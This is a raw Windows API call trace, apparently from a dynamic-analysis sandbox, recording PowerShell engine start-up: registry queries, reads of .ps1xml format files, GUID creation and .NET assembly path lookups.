	[0740.231] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.235] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.235] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.236] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.236] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.236] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.237] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.237] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.237] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.238] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1b4, lpOverlapped=0x0) returned 1
	[0740.238] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x0, lpOverlapped=0x0) returned 1
	[0740.238] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2c8 | out: phkResult=0xcd2c8*=0x318) returned 0x0
	[0740.238] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd24c, lpData=0x0, lpcbData=0xcd248*=0x0 | out: lpType=0xcd24c*=0x1, lpData=0x0, lpcbData=0xcd248*=0x56) returned 0x0
	[0740.239] CoTaskMemAlloc (cb=0x5a) returned 0x286c630
	[0740.239] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd21c, lpData=0x286c630, lpcbData=0xcd218*=0x56 | out: lpType=0xcd21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd218*=0x56) returned 0x0
	[0740.239] CoTaskMemFree (pv=0x286c630) 
	[0740.239] RegCloseKey (hKey=0x318) returned 0x0
	[0740.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0740.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0748.643] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0748.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.643] CoTaskMemFree (pv=0x1f3950) 
	[0748.667] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd468 | out: phkResult=0xcd468*=0x198) returned 0x0
	[0748.667] RegQueryValueExW (in: hKey=0x198, lpValueName="path", lpReserved=0x0, lpType=0xcd47c, lpData=0x0, lpcbData=0xcd478*=0x0 | out: lpType=0xcd47c*=0x1, lpData=0x0, lpcbData=0xcd478*=0x74) returned 0x0
	[0748.667] RegQueryValueExW (in: hKey=0x198, lpValueName="path", lpReserved=0x0, lpType=0xcd3ec, lpData=0x0, lpcbData=0xcd3e8*=0x0 | out: lpType=0xcd3ec*=0x1, lpData=0x0, lpcbData=0xcd3e8*=0x74) returned 0x0
	[0748.667] CoTaskMemAlloc (cb=0x78) returned 0x236b30
	[0748.667] RegQueryValueExW (in: hKey=0x198, lpValueName="path", lpReserved=0x0, lpType=0xcd3bc, lpData=0x236b30, lpcbData=0xcd3b8*=0x74 | out: lpType=0xcd3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd3b8*=0x74) returned 0x0
	[0748.667] CoTaskMemFree (pv=0x236b30) 
	[0748.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0748.668] SetErrorMode (uMode=0x1) returned 0x1
	[0748.668] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0748.668] SetErrorMode (uMode=0x1) returned 0x1
	[0748.669] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0748.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.669] CoTaskMemFree (pv=0x1f3950) 
	[0748.675] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0748.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.675] CoTaskMemFree (pv=0x1f3950) 
	[0748.675] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0748.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.676] CoTaskMemFree (pv=0x1f3950) 
	[0748.676] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0748.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.676] CoTaskMemFree (pv=0x1f3950) 
	[0748.677] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0748.677] GetFileType (hFile=0x314) returned 0x1
	[0748.677] SetErrorMode (uMode=0x1) returned 0x1
	[0748.677] GetFileType (hFile=0x314) returned 0x1
	[0748.677] ReadFile (in: hFile=0x314, lpBuffer=0x341c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x341c570*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.838] ReadFile (in: hFile=0x314, lpBuffer=0x341c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x341c570*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.838] ReadFile (in: hFile=0x314, lpBuffer=0x341c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x341c570*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.838] ReadFile (in: hFile=0x314, lpBuffer=0x341c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x341c570*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.839] ReadFile (in: hFile=0x314, lpBuffer=0x341c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x341c570*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.840] ReadFile (in: hFile=0x314, lpBuffer=0x341c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x341c570*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.840] ReadFile (in: hFile=0x314, lpBuffer=0x341c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x341c570*, lpNumberOfBytesRead=0xccfd8*=0x9e2, lpOverlapped=0x0) returned 1
	[0749.840] ReadFile (in: hFile=0x314, lpBuffer=0x341baba, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x341baba*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0749.840] ReadFile (in: hFile=0x314, lpBuffer=0x341c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x341c570*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0749.840] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x314) returned 0x0
	[0749.841] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
	[0749.841] CoTaskMemAlloc (cb=0x5a) returned 0x286c5c0
	[0749.841] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x286c5c0, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
	[0749.841] CoTaskMemFree (pv=0x286c5c0) 
	[0749.841] RegCloseKey (hKey=0x314) returned 0x0
	[0749.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0749.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0749.846] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x8196f38a, Data2=0x5e9e, Data3=0x4500, Data4=([0]=0x8d, [1]=0x5, [2]=0x30, [3]=0x5e, [4]=0x37, [5]=0x4, [6]=0x5f, [7]=0xdb))) returned 0x0
	[0749.851] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x5a9c7621, Data2=0xa690, Data3=0x4b72, Data4=([0]=0xa5, [1]=0xbd, [2]=0x46, [3]=0x7c, [4]=0x98, [5]=0x5d, [6]=0x7b, [7]=0x59))) returned 0x0
	[0749.852] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0749.852] GetFileType (hFile=0x314) returned 0x1
	[0749.852] SetErrorMode (uMode=0x1) returned 0x1
	[0749.853] GetFileType (hFile=0x314) returned 0x1
	[0749.853] ReadFile (in: hFile=0x314, lpBuffer=0x34470d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34470d8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.853] ReadFile (in: hFile=0x314, lpBuffer=0x34470d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34470d8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.854] ReadFile (in: hFile=0x314, lpBuffer=0x34470d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34470d8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.855] ReadFile (in: hFile=0x314, lpBuffer=0x34470d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34470d8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.855] ReadFile (in: hFile=0x314, lpBuffer=0x34470d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34470d8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.857] ReadFile (in: hFile=0x314, lpBuffer=0x34470d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34470d8*, lpNumberOfBytesRead=0xccfd8*=0xfb2, lpOverlapped=0x0) returned 1
	[0749.858] ReadFile (in: hFile=0x314, lpBuffer=0x34467f2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34467f2*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0749.858] ReadFile (in: hFile=0x314, lpBuffer=0x34470d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34470d8*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0749.869] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x198) returned 0x0
	[0749.869] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
	[0749.869] CoTaskMemAlloc (cb=0x5a) returned 0x2a5a90
	[0749.869] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x2a5a90, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
	[0749.869] CoTaskMemFree (pv=0x2a5a90) 
	[0749.869] RegCloseKey (hKey=0x198) returned 0x0
	[0749.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0749.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0749.870] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xff97162b, Data2=0x3155, Data3=0x4420, Data4=([0]=0xab, [1]=0xd6, [2]=0x6c, [3]=0xa3, [4]=0xc2, [5]=0x5e, [6]=0xb8, [7]=0x5f))) returned 0x0
	[0749.871] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x87d16df6, Data2=0x3391, Data3=0x4bae, Data4=([0]=0xbc, [1]=0x1d, [2]=0xd1, [3]=0x8f, [4]=0x52, [5]=0x20, [6]=0x47, [7]=0x66))) returned 0x0
	[0749.872] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xab90f4be, Data2=0x7c27, Data3=0x4cb2, Data4=([0]=0x98, [1]=0x56, [2]=0xc2, [3]=0xaf, [4]=0x3f, [5]=0x50, [6]=0xdd, [7]=0x90))) returned 0x0
	[0749.872] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x8284285f, Data2=0x343c, Data3=0x4d8a, Data4=([0]=0xb1, [1]=0x3d, [2]=0x71, [3]=0xb8, [4]=0x87, [5]=0xe2, [6]=0x9b, [7]=0x62))) returned 0x0
	[0749.872] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x2a97e5cc, Data2=0x7c4, Data3=0x48b3, Data4=([0]=0xa4, [1]=0x61, [2]=0x9b, [3]=0x35, [4]=0x64, [5]=0xd9, [6]=0x63, [7]=0xd5))) returned 0x0
	[0749.872] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x85b50033, Data2=0x8159, Data3=0x4306, Data4=([0]=0xb9, [1]=0x0, [2]=0xc0, [3]=0x58, [4]=0xc7, [5]=0x19, [6]=0x69, [7]=0x73))) returned 0x0
	[0749.872] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x198
	[0749.872] GetFileType (hFile=0x198) returned 0x1
	[0749.872] SetErrorMode (uMode=0x1) returned 0x1
	[0749.873] GetFileType (hFile=0x198) returned 0x1
	[0749.873] ReadFile (in: hFile=0x198, lpBuffer=0x32f5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x32f5ed8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.874] ReadFile (in: hFile=0x198, lpBuffer=0x32f5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x32f5ed8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.874] ReadFile (in: hFile=0x198, lpBuffer=0x32f5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x32f5ed8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.874] ReadFile (in: hFile=0x198, lpBuffer=0x32f5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x32f5ed8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.874] ReadFile (in: hFile=0x198, lpBuffer=0x32f5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x32f5ed8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.874] ReadFile (in: hFile=0x198, lpBuffer=0x32f5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x32f5ed8*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0749.875] ReadFile (in: hFile=0x198, lpBuffer=0x32f5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x32f5ed8*, lpNumberOfBytesRead=0xccfd8*=0xaca, lpOverlapped=0x0) returned 1
	[0749.875] ReadFile (in: hFile=0x198, lpBuffer=0x32f550a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x32f550a*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0749.875] ReadFile (in: hFile=0x198, lpBuffer=0x32f5ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x32f5ed8*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0749.875] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x198) returned 0x0
	[0749.875] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
	[0749.875] CoTaskMemAlloc (cb=0x5a) returned 0x2a5a90
	[0749.875] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x2a5a90, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
	[0749.876] CoTaskMemFree (pv=0x2a5a90) 
	[0749.876] RegCloseKey (hKey=0x198) returned 0x0
	[0749.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0749.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0751.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0751.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0751.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0751.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0751.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0751.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0751.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
